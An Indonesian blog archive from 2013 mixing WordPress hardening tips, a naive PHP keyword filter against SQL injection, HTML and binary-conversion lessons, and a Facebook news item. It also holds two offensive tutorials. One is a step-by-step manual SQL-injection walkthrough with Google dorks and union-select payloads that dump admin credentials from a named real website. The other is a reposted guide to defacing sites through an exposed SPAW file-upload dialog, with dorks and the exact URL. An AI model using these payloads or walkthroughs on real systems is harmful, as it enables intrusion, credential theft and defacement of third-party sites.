Selasa, 16 Juli 2013

17 cara mengamankan website

Seperti yang telah kita ketahui sebelumnya, website yang menggunakan CMS instant seperti Wordpress rentan terhadap hacking, malware, dan aktivitas cybercrime lainnya. Untuk itu, butuh pengamanan ekstra terhadap Wordpress anda.


Berikut 17 Cara untuk menambah sistem keamanan (security) WordPress + Plugin :
1. Tidak Menggunakan Username “admin”.
Karena username “tertinggi” tersebut yang sebetulnya menjadi makanan empuk bagi para hacker. Ada baiknya menggunakan username dengan mengkombinasikan antara huruf dan angka. Misal :“u53r6w”. Terkesan 4L4Y bukan? Namun terkadang kita harus bersikap lebih bervariasi daripada para hacker.
2. Mengupdate ke Versi Terbaru.
Selalu mempunyai website yang terupdate, merupakan langkah bijak bagi para pengguna WordPress. Hal ini untuk menutup celah-celah (hole) yang dapat dimasuki oleh para hacker. Informasi update-an baru biasanya akan tersedia di website utama WordPress[http://wordpress.com/] atau halaman depan administrator (wp-admin).
3. Hapus File “readme.html”.
File “readme.html” berisi versi Wordpress anda. Hapus saja file tersebut sesaat setelah anda melakukan upgrade WordPress.
4. Hapus File “install.php”.
File “wp-admin/install.php” hanya dipakai saat menginstall Wordpress saja. Sudah tidak diperlukan lagi bila Wordpress sudah berjalan. So, hapus juga file tersebut dari sistem WordPress.
5. HAPUS! Dan Jangan Menggunakan Theme Default WordPress
Belakangan terdapat isu bahwa banyaknya hacker yang menyerang website WordPress, masuk melalui theme Default yang diberikan Wordpress yaitu “Twenty Ten”, “Twenty Eleven”, dan“Classic”. Ada baiknya kita tidak mempergunakan theme tersebut, dan dihapus saja. Karena tanpa dipergunakan pun, hacker masih bisa menyerang lewat sana.
6. Gunakan Password Yang Kuat.
Sekali lagi kita harus belajar menjadi manusia yang 4L4Y. Namun hal ini dapat membantu kita jika kekuatan password yang kita miliki maksimal. Bisa juga menggunakanhttp://strongpasswordgenerator.com/ untuk mendapatkan password yang kuat.
7. Lindungi File “wp-config.php”.
Kita harus membuat file ini tidak bisa diakses oleh siapapun juga. Mudah saja, tinggal masukkan kode ini di file “.htaccess” anda :
[Image: wp1.jpg]
8. Blokir Folder “wp-xxxxxx”.
Kita tidak ingin folder-folder dalam system Wordpress dijelajahi oleh siapapun. Jadi, masukkan kode ini di file “robot.txt” :
[Image: wp2-300x35.jpg]

9. Hilangkan Versi WordPress.
Masukkan kode ini di file “functions.php” pada themes anda :
[Image: wp3-300x47.jpg]
10. Ubah Table “Prefix”.
Cara ini cukup efektif, tapi memang agak susah terutama bila website sudah berjalan. Caranya adalah dengan membackup terlebihdahulu database anda. Dengan bantuan Notepad, lakukan“find and replace” dengan merubah setiap awalan “wp_” menjadi prefix lain misalnya “newp_”.
Setelah selesai, import SQL-nya ke phpmyadmin sehingga disana akan ada 2 macam tabel. Yaitu tabel dengan awalan “wp_” dan “newp_”.
Jika proses pengubahan selesai, kini tinggal mengganti table prefix yang ada di “wp-config.php”. Cari kode berikut :
[Image: wp4-300x57.jpg]
Lalu ganti dengan table prefix “newp_”, maka kodenya menjadi seperti ini :
[Image: wp5-300x53.jpg]
11. Sesuaikan CHMOD Permission.
Pastikan CHMOD permission pada file dan folder website anda telah sesuai dengan yang disarankan. biasanya permission untuk folder : 755, dan untuk file : 644[http://www.qwords.com/kb/mengganti-chmod-permission/]
12. Backup Secara Berkala.
Ada baiknya kita mempunyai backup secara berkala. Untuk akun hosting yang menggunakan cPanel, dapat membuat file backup melalui fitur backup yang disediakan oleh cPanel (cPanel->Backups). File backup biasanya berekstensikan .tar.gz, dapat diamankan / disimpan dengan mendownload file tersebut ke komputer pribadi anda. Sehingga jika sewaktu-waktu website anda terkena hack, anda dapat mengupload kembali file backup tersebut, kemudian me-request kepada pihak teknis untuk merestore file backup anda melalui Support Ticket di Tempat hosting anda..

13. Scan Komputer anda
Hal yang sering tidak disadari, ternyata komputer kita sendiri yang memasukan malware ke dalam hosting yang kemudian menjadi alat bagi pembuat malware untuk dapat masuk ke sistem website/hosting kita. jadi sebaiknya selalu scan komputer/laptop yang anda pergunakan secara rutin.
14. Ganti password secara berkala
Sudah pasti jika website kita terhack, dengan segera kita langsung mengubah password dengan password yang baru, namun akan lebih baik jika hal ini dilakukan setiap bulan dan secara menyeluruh (FTP,MYSQL,CPANEL, dan Dashboard wordpress)
15. Mengganti secret key default di wp-config.php
untuk secret key yang baru dapat anda dapatkan dari situs resmi wordpresshttps://api.wordpress.org/secret-key/1.1/salt/
setelah seorang hacker berhasil login di Wordpress kita, maka cookies dari record akan disimpan agar hacker bisa tetap masuk ke dashboard walaupun password sudah kita ganti dengan yang baru, untuk mengantisipasinya silakan ganti secret key di “wp-config.php” dengan yang anda dapat di link diatas.
contoh secret key:
define(‘AUTH_KEY’, ‘h4VSBp#[])*6K5;vV&fR0]GccHyziEPbs)3>EhK.$P~hW]W4v!Q:47s2GRrq@!K&’);
16. Cek .htacess segera
Sempatkan untuk mengecek file satu ini, jika anda tidak ingin setiap komputer yang mengakses website anda malah terkena malware dari website berbahaya yang dipasang hacker di htaccess website anda. dengan me-redirect website anda ke website berbahaya, ini membuat anda akan terkena hack dan terinfeksi malware disaat yang bersamaan.
[Image: scripthackerdihtaccess.jpg]
17. Me-recreate hosting anda
Poin terakhir ini anda lakukan hanya jika anda berulang kali terkena hack kembali sedangkan semua tips security sudah anda lakukan, ini disebabkan hacker sudah menanam program didalam website anda sehingga memudahkan hacker untuk kembali melakukan hack, maka anda dapat membersihkan hosting anda ke keadaan baru membeli hosting, silakan membuat support tiket ke bagian teknis dengan subject "recreate hosting".
Langkah-langkah di atas tidak menjamin website Wordpress anda aman 100% dari hacker.
Semoga tutorial ini dapat membantu anda yang ingin selalu menjaga website tetap aman.
Berikut ini Plugin Security Terbaik untuk Mengamankan Blog WordPress:

Secure WordPress
Secure Wordpress akan menjaga keamanan file instalasi Wordpress dengan menghapus informasi fatal pada halaman login, menambahkan index.html ke setiap direktori content, menyembunyikan versi Wordpress dan banyak lagi.
WP Firewall 2
Dengan bantuan plugin ini, blog bisa menjadi lebih kebal dari berbagai serangan yang dapat merugikan blog. WP Firewall akan mem-blok setiap aktifitas yang bersifat inject. Selain itu jika ada serangan yang terjadi, plugin ini akan memblok kemudian memberi tahukannya ke email admin mengenai detail serangan, IP penyerang, jenis serangan dll.
Stealth Login
Plugin Wordpress Stealth Login ini berfungsi untuk membuat url dari halaman login pada blog wordpress menjadi lain dari biasanya. Jika pada Wordpress standart kita melakukan login via urlnamadomain.com/wp-login.php, maka dengan bantuan plugin ini kita bisa membuatnya berbeda. Url halaman login bisa kita modif sesuka kita, misal menjadi namadomain.com/masuk. Jadi hanya admin saja yang dapat mengakses Dashboard wordpress.
Exploit Scanner
Plugin ini akan memindai semua file yang ada pada direktori blo/website, posting, komentar dan juga tabel database untuk memonitor dan memberitahukan tentang adanya file atau celah yang mencurigakan.g
Timthumb Vulnerability Scanner
Tak sedikit theme Wordpress yang menggunakan script timthumb (timthumb.php). Dan sayangnya file timthumb ini seringkali mempunyai celah keamanan yang dapat membahayakan penggunanya. Maka dengan bantuan plugin ini kita bisa menambal celah keamanan tersebut.
WP Security Scan
WP Security Scan untuk Wordpress / blog berfungsi untuk memindai kerentanan keamanan dan menyarankan tindakan korektif seperti:
Password
File permissions
Keamanan database
Menyembunyikan Versi WordPress
Menghapus WP Generator META tag
Berikut hanyalah beberapa rekomendasi saja, selebihnya masih banyak lagi plugin-plugin yang dapat kita gunakan untuk lebih meningkatkan security blog Wordpress kita.
Plugin Security Wordpress bisa dilihat selengkapnya di: http://wordpress.org/extend/plugins/tags/security

sekian dari ane =))

Senin, 15 Juli 2013

Patch SQL

BIASAKAN UNTUK MEMBACA !!

Sebelumnya mari kita liat pengertian mysql injection secara umum :
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Para pemula biasanya lebih senang mengexploitasi mysql v.5 dari pada v.4 . mysql v.5 support terhadap information_schema yang memudahkan attacker untuk melancarkan serangan injeksi. Bahkan dengan beberapa sql scanner tools para lamer dan scriptkiddies dengan begitu mudahnya dapat melakukan serangan – serangan.

Contoh Serangan SQL ., missalkan saya ambil contoh SQL V.5

Code:
http://localhost/cobain/injector/index.php?id=-4+union+select+1,@@version,3,4,5--

[Image: 6_zpsa23ad91b.jpg]

Pada kesempatan kali ini saya hanya akan mencoba melakukan pencegahan dengan predefined atau PHP Superglobal . $_SERVER['REQUEST_URI'] yang menangkap nilai pada URL.

buat file php baru dengan nama antisqli.php lalu masukkan script berikut.

Code:
<?php
if (strlen($_SERVER['REQUEST_URI']) > 255 || strpos($_SERVER['REQUEST_URI'], "concat") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "base64")) {
echo "Maaf Bro... Apa tuh? Mau Nakal Yah :p";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;
}
?>

Setelah itu kita melakukan include pada index.php di dalam folder injector tadi.

Code:
<?php
    include 'library/config.php';
    include 'library/opendb.php';
    include 'antisqli.php';
    ?>

Di bagian paling atas tinggal tambahkan aja include ‘antisqli.php’;. Setelah itu buka link yang tadi kita sisipkan perintah SQL dan apa yang terjadi?
[Image: 7.jpg]

Keren kan? Oke kita lihat lagi antisqli.php – nya…

Code:
if (strlen($_SERVER['REQUEST_URI']) > 255 || strpos($_SERVER['REQUEST_URI'], "concat") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "base64"))

Jika variabel di URL lebih dari 255 atau (tanda || dibaca atau) ada kata “concat“, “union” dan “base64“.

Code:
echo "Maaf Bro... Apa tuh? Mau Nakal Yah ";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;

Maka akan muncul pesan “Maaf Bro… Apa tuh? Mau Nakal Yah ?
kemudian dilanjutkan dibawahnya.

Nah gak hanya cuman union / concat kan jika kita melakukan SQL Injection. Ada select, @@version dan lain – lain. Kan kalian yang lebih jago kalo soal beginian., Nantinya kalian tinggal tambahkan aja menjadi.

Code:
strpos($_SERVER['REQUEST_URI'], "concat")

Jangan lupa tanda || (atau) penggunaan stripos (case insensitive).

Code:
if (strlen($_SERVER['REQUEST_URI']) > 255 || stripos($_SERVER['REQUEST_URI'], "concat") || stripos($_SERVER['REQUEST_URI'], "union") || stripos($_SERVER['REQUEST_URI'], "base64")) {

Atau menggunakan preg_match:
Code:
<?php
$berbahaya = array("union", "concat", "base64");

$gabungsemua = implode("|",$berbahaya);
if((strlen($_SERVER['REQUEST_URI']) > 255) || (preg_match("/".$gabungsemua."/i",$_SERVER['REQUEST_URI']))){
echo "Maaf Bro... Apa tuh? Mau Nakal Yah";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;
?>

Sekarang union,UNIon,unIoN dan variasi – variasi yang lain pasti gak akan berhasil…

cara deface website menggunakan SQL Injection Manual


hay Sobat gmn kabarmu :D (sok kenal banget :v wkwkkw )
kali ini ane akan membagikan tutorial cara deface web menggunakan metode SQL Injection MANUAL

Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
Contoh : http://situsq.com/berita.php?id=14’

http://situsq.com/berita.php?id=’14

Apabila terlihat pesan error seperti ini :
You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Maka bisa dipastikan situs tersebut terdapat celah SQL Injection…

dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR,

Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:

https://addons.mozilla.org/id/firefox/addon/hackbar/

[/quote]langsung saja ke TKP

yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=

Copas dork di atas ke google.com , setelah itu pilih target sobat
contoh :
http://www.zenfocus.com/partners.php?id=2
nah sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung

[/URL]

Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali

Contoh:
http://www.zenfocus.com/partners.php?id=2 order by 1–  no error
http://www.zenfocus.com/partners.php?id=2 order by 2–  no error
http://www.zenfocus.com/partners.php?id=2 order by 3–  no error
http://www.zenfocus.com/partners.php?id=2 order by 4–  no error
http://www.zenfocus.com/partners.php?id=2 order by 5–  no error
http://www.zenfocus.com/partners.php?id=2 order by 6–  no error
http://www.zenfocus.com/partners.php?id=2 order by 7–  error

[Image: bahan-post-2_zps4ff3bcc5.png]
eror table ke 7

Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6–



Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6–



Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda –

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–



Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”



dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –> MySQL –> MySQL CHAR()



setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok



sehingga perintah kita menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Setelah itu tekan Execute
Dan hasilnya



Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin—



tekan Execute

dan hasilnya

[URL=http://i1285.photobucket.com/albums/a594/Rizal_Sullivan_Chapellanoz_Sevenfoldisme/bahan-post-210_zps4ef6f79f.png[/IMG]

Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat sobat

NB : PESAN DARI ANE , INGAT berjuta-juta WEBSITE yang anda DEFACE tidak akan membuat anda menjadi HEBAT

SALAM CYBER DARI SAYA
we are Indonesian Security Down
expect us

Terimakasih
wassallam

Kamis, 11 Juli 2013

Hyperlink Dalam Html



Dalam istilah web, hyperlink adalah referensi (sebuah alamat) ke sumber-sumber informasi lain di Internet. Hyperlink biasanya merujuk ke sebuah halaman HTML, sebuah gambar, file suara, movie, dll. Sedangkan anchor (bahasa Indonesianya Jangkar) adalah istilah yang digunakan untuk mendefinisikan tujuan hyperlink dalam sebuah dokumen.

Jadi gini, alamat halamannya ditunjukkan oleh hyperlink, sedangkan kalau di dalam dokumen itu ada bab 2, maka kita bisa langsung merujuk ke bab 2 tadi dengan bantuan anchor.

Untuk membuat hyperlink dan anchor kita menggunakan elemen HTML anchor <a>.

Dalam tutorial kali ini, kita akan menggunakan istilah link HTML saat elemen <a> merujuk ke sebuah halaman dan istilah anchor HTML saat element <a> tersebut merujuk ke sebuah alamat di dalam dokumen.
1
<a href="http://URL">Teks Link</a>
Perhatikan, tag HTML pembuka berisi atribut link tersebut.
Isi elemen (Teks link) mendefinisikan apa yang ingin anda tampilkan ke pengunjung.
Catatan: Isi elemen tidak harus berupa teks loh! Sobat juga bisa me-link dari sebuah gambar atau elemen HTML lainnya.

Atribut href

Atribut href adalah alamat yang akan dibuka saat seseorang mengklik link yang kita buat.
Elemen <a> ini mendefinisikan sebuah link yang akan menuju ke sebuah blog yang saya kelola juga yaitu pascal204.blogspot.com :
1
<a href="http://chyber-id.blogspot.com/">KLIK DISINI</a>
Kode tersebut akan ditampilkan seperti beikut :
KLIK DISINI

Atribut target

Atribut target sangat berguna bagi kita untuk mengatur halaman yang kita tuju itu akan dibuka di mana. Sobat bisa membukanya di halaman utama ini langsung atau membukanya di halaman baru saat seorang pengunjung mengklik link yang kita sediakan.
Berbeda dengan kode sebelumnya yang membuka web site di jendela yang sama, kode ini akan membuka web site pada sebuah jendela baru :
1
<a href="http://chyber-id.blogspot.com/" target="_blank">KLIK DISINI</a>
Kode tersebut akan ditampilkan seperti beikut :
KLIK DISINI

Attribute name

Saat kita menggunakan atribut name, maka itu berarti kita mendefinisikan sebuah nama anchor yang berada di dalam sebuah halaman HTML. Nama anchor tidak akan nampak di mata pengunjung. Itu hanya merupakan pendefinisian di sebuah halaman web aja.
Cara membuat sebuah anchor :
1
<a name="label">Begini</a>
Nah, link yang menuju ke halaman itu bikinnya gini :
1
<a name="#label">Begini</a>
Perhatikan tanda # yang mendefinisikan nama anchor
Contoh:
Sebuah anchor dalam dokumen HTML:
1
<a name="top">Ini bagian paling atas</a>
Sebuah link yang merujuk ke bagian paling atas dalam dokumen yang sama:
1
<a href="#top">Kembali ke atas</a>
Sebuah link yang menuju ke sebuah anchor di halaman web lain:
1
2
<a href="http://chyber-id.blogspot.com.htm#top">
Kembali ke halaman utama paling atas</a>
Nah, kalau mau lihat bagaimana sebuah link anchor bekerja, klik Kembali ke atas ini untuk menuju ke bagian paling atas dari halaman ini.
Catatan penting dan tips yang pastinya akan berguna buat Sobat.
Ingat untuk selalu menambahkan garis miring di akhir sub folder link kita.
Jika link kita bentuknya seperti ini :
href="chyber-id.com/belajar/", maka sobat akan membuat 2 buah permintaan http ke server, karena server akan menambahkan garis miring dan membuat alamat yang kita minta tadi menjadi seperti ini:

Nah, dengan menambahkan garis miring di akhir sub folder, kita sudah menghemat resource di server.
Sobat bisa menggunakan Anchor untuk membuat daftar isi di awal sebuah dokumen yang panjang.
Kalau browser tidak bisa menemukan anchor yang kita tentukan, maka secara otomatis akan menuju ke bagian paling atas dari dokumen. Tanpa error.

cara mengkonversi bilangan biner ke.html

Sebelumnya, Saya akan mencoba menjelaskan tentang apa itu itu Bilangan Biner/Binary?
Bilangan Biner adalah sistem bilangan yang menggunakan suatu bilangan dasar atau basis (Radix) tertentu. Untuk bilangan biner menggunakan basis 2, menggunakan 2 macam simbol bilangan berbentuk 2 digit angka yaitu angka 0 dan 1.
Untuk mengkorversi Bilangan Biner kedalam bentuk teks maka yang harus sobat lakukan adalah :

  • RUBAH BILANGAN BINER KE DESIMAL
Sobat pasti sudah pernah melihat kode biner, seperti di bawah inikan?
01001010101010100110101

Pertama-tama yang kita lakukan adalah mengubah bilangan biner yang hanya terdi dari angka 0 dan 1 tersebut kedalam bilangan desiman. Kemudian baru kita terjemahkan bilangan decimal terseebut dalam bentuk teks agar dapat kita baca.

SISTEM BINER:

Di sini adalah satu contoh sederhana dari bilangan biner:
1 0 1 0 1 0 1

Untuk mengubah bilangna biner tersebut kedalam angka, maka yang perlu sobat lakukan adalah mengalikan setiap bilangan tersebut dengan bilangan 2 berpangkat, jadinya seperti berikut :

1 0 1 0 1 0 1 = (1x64)+(0x32)+(1x16)+(0x8)+(1x4)+(0x2)+(1x1)

1 0 1 0 1 0 1 = 64 + 0 + 16 + 0 + 4 + 0 + 1

1 0 1 0 1 0 1 = 85

NB : Untuk memberi pangkat pada Bilangan 2, lakukan dengan dengan cara berurutan dan diakhiri dengan pangkat 0
Sekarang sebagai latihan cobalah ubah beberapa bilangan biner yang sobat buat sendiri kedalam bilangan disimal.


  • CARA MERUBAH BILANGAN BINER KE CODE ASCII
Untuk mempermudah mengubah bilangan biner yagn telah kita ubah menjadi bilangan decimal tadi ke dalam bentuk teks, maka kita harus memperhatikan table KODE ASCII berikut :


Setelah sobat mempelajari table kode ASCII diatas sekarang kita coba untuk mengubah bilangan biner kedalam bentuk teks.
Misalnya kita ambil contoh bilangan biner berikut :

0101011101010101010100110011001000110100

Untuk langkah pertama yang harus kita lakukan adalah kita pisahkan dulu bilangan biner di atas menjadi 8 digit seperti berikut :

01010111   01010101   01010011   00110010   00110100

Sekarang, kita ubah bilangan biner tersebut per 8 digit dengan cara menghitungnya seperti yang telah dijelaskan diatas.

Delapan Digit ke-1 :
01010111 = (0x128) + ( 1x64) + (0x32) + (1x16) + (0x8) + (1x4) + (1x2) + (1x1)
01010111 =      0       +      64    +      0    +     16    +    0     +     4    +     2    +   1
01010111 =     87

Delapan Digit ke-2 :
01010101 = (0x128) + ( 1x64) + (0x32) + (1x16) + (0x8) + (1x4) + (0x2) + (1x1)
01010101 =      0       +      64    +      0    +     16    +    0     +     4    +     0    +   1
01010101 =     85

Delapan Digit ke-3 :
01010011 = (0x128) + ( 1x64) + (0x32) + (1x16) + (0x8) + (0x4) + (1x2) + (1x1)
01010011 =      0       +      64    +      0    +     16    +    0     +     0    +     2    +   1
01010011 =     83

Delapan Digit ke-4 :
00110010 = (0x128) + ( 0x64) + (1x32) + (1x16) + (0x8) + (0x4) + (1x2) + (0x1)
00110010 =      0       +      0    +      32    +     16    +    0     +     0    +     2    +  0
00110010 =     50

Delapan Digit ke-5 :
00110100 = (0x128) + ( 0x64) + (1x32) + (1x16) + (0x8) + (1x4) + (0x2) + (0x1)
00110100 =      0       +      0     +      32    +    16    +    0     +     4    +     0    +   0
00110100 =     52

Jadi, hasil konversi Biner ke Decimal adalah :
01010111 =     87
01010101 =     85
01010011 =     83
00110010 =     50
00110100 =     52

Untuk mengetahui karakter apa yg di hasilkan dari bilangan biner diatas, maka kita harus melihat table kode ASCII.
01010111 =     87  = W
01010101 =     85  = U
01010011 =     83  = S
00110010 =     50  = 2
00110100 =     52  = 4

Facebook Meluncurkan Fitur Verifikasi Untuk Akun Asli dan Palsu

Facebook-Authentic-and-Fake-Accounts
Jika Anda adalah seorang pengguna setia Facebook dan menjadi follower selebriti favorit, Merek Produk, dan Komunitas, mungkin yang mengganggu Anda adalah untuk menemukan fan page resmi dari kategori itu. Facebook Fan Page telah memberikan dorongan nyata untuk situs jejaring sosial ini di mana hampir setiap orang bisa membuat fan page penggemar sehingga sulit bagi pengguna untuk mengidentifikasi fan page yang asli. Untuk melawan masalah ini, Facebook telah hadir dengan strategi baru untuk membantu pengguna mengidentifikasi akun otentik untuk menghindari menjadi korban dari fan page palsu.
Facebook masuk ke bisnis verifikasi, meminjam sebuah fitur yang pertama kali diperkenalkan Twitter hampir empat tahun lalu. Lencana verifikasi Facebook untuk untuk fan page dan profil juga meniru Twitter dengan meninggalkan banyak proses yang tidak diketahui dan internal.
Ini jelas mengapa Facebook membuat langkah untuk memverifikasi merek dan tokoh terkenal dengan khalayak yang besar di situs dan berencana untuk memulai proses proaktif selama beberapa hari mendatang. Perusahaan akan "otomatis memverifikasi halaman terbesar di Facebook yang berada pada risiko terbesar dari duplikasi", kata juru bicara Facebook.
"Saya berpikir bahwa itu adalah masalah bagi banyak merek-merek terkenal," kata Raina Penchasky, direktur strategi untuk Digital Brand Architects. "Sosial dan digital adalah ruang sulit bagi pemilik merek-merek mewah, karena merek-merek mewah lebih memilih untuk mempertahankan aura eksklusivitas dengan membatasi eksposur dan akses mereka ke khalayak yang tidak ditargetkan lebih luas," tambahnya.
Sementara halaman diverifikasi dan profil akan ditambahkan beberapa bukti keaslian, merek tidak benar-benar mengemis untuk fitur tersebut atau menghindari Facebook karena mereka tidak memiliki lencana biru kecil dan tanda periksa di samping nama mereka di seluruh situs.
facebook-verification
Namun, menurut Penchansky, beberapa merek mungkin sedikit gelisah tentang proses verifikasi, terutama karena Facebook tidak menguraikan persyaratan untuk verifikasi atau kemampuan untuk meminta profil atau halaman untuk diverifikasi.
Tanda cek biru mengidentifikasi bahwa halaman telah diverifikasi dan profil akan muncul di timeline, stories, hasil pencarian, news feed ads. Merek yang tidak secara otomatis menerima verifikasi selama beberapa minggu mendatang sedang dirujuk ke pusat bantuan Facebook di mana masalah duplikasi dapat diselesaikan.
Pembaruan ini meskipun tidak seberapa namun adalah sesuatu yang akan sangat membantu dalam membuat pengguna Facebook lebih mudah bagi masyarakat. Halaman-halaman Fan yang ada walau bagaimanapun tidak bisa membuat diri mereka sebagai halaman otentik dan halaman yang ada akan dinyatakan otentik berdasarkan jumlah pelanggan.

Rabu, 10 Juli 2013

Belajar hacking dari awal :)

(Pemula)Tutor Lengkap+Gambar Deface Spaw Upload Vulnerably Maaf sebelumnya buat para mimin dan momod
kalau saya repost
dari tutor http://hacker-newbie.org/showthread.php?...light=spaw
Kalau memang tidak berguna silahkan hapus

Menurut saya Threed ini sangat berguna untuk yang benar-benar
pemula seperti saya,,soalnya mengingat beberapa hari lalu ada yang post http://hacker-newbie.org/showthread.php?tid=12893 menanyakan dari mana memulai untuk deface,,disini akan dijelaskan dengan GAMBAR semoga berguna buat yang bener-bener pemula seperti saya

Oke mari dibahas

Pertama : search dorknya di google : inurl:”spaw2/dialogs/” atau inurl:”spaw2/uploads/files/”
Lihat gambar


[Image: 30j334i.jpg]

Setelah anda search dork tadi di google
pilih salah satu web yang mau di deface ingat gx semua web bisa yah :P

Lihat gambar

[Image: 9u4wup.jpg]

setalah anda masuk dalam webnya
anda lihat URLnya di adrees bar
Contoh URLNYA : http://contoh.com/spaw2/uploads/files/
bagian /spaw2/uploads/files/

diganti dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

LIHAT GAMBAR

[Image: 2z4a0s3.jpg]
Spoiler Hide
[Image: zv3bjo.jpg]

Tekan Enter
Akan Terbuka Gambar Seperti INI
LIHAT TUTOR DALAM GAMBAR


[Image: 14jqof7.jpg]

Lanjut
lihat terus gambar tutor ada didalam gambar

[Image: 2m6of8l.jpg]

LANJUT
Spoiler Hide
[Image: 2076hw4.jpg]

Lanjut TUTOR ADA DI GAMBAR

[Image: 2884dbc.jpg]

LANJUT

[Image: 34y4ahe.jpg]

SELESAI
Semoga bisa dimengerti

KALAU GAMBAR KURANG JELAS DIREFRESH AJA ATAU BUKA SATU-SATU YAH

SUmber Hn..

Cara Mengetahui Web Server yang Digunakan Suatu Website

Sebagai Web Developer ataupun Website Administrator terkadang kita ingin mengetahui jenis web server yang digunakan oleh suatu website. Seperti yang kita ketahui bahwa cukup banyak jenis web server yang populer digunakan di internet.
Berdasarkan survey yang dilakukan Netcraft pada tahun 2010, Apache Web Server mendominasi jagat internet dengan penggunaan sebesar 53,93%. Diikuti oleh IIS Web Server milik Microsoft sebesar 24,97%. Dua web server ini adalah yang paling banyak digunakan di internet.

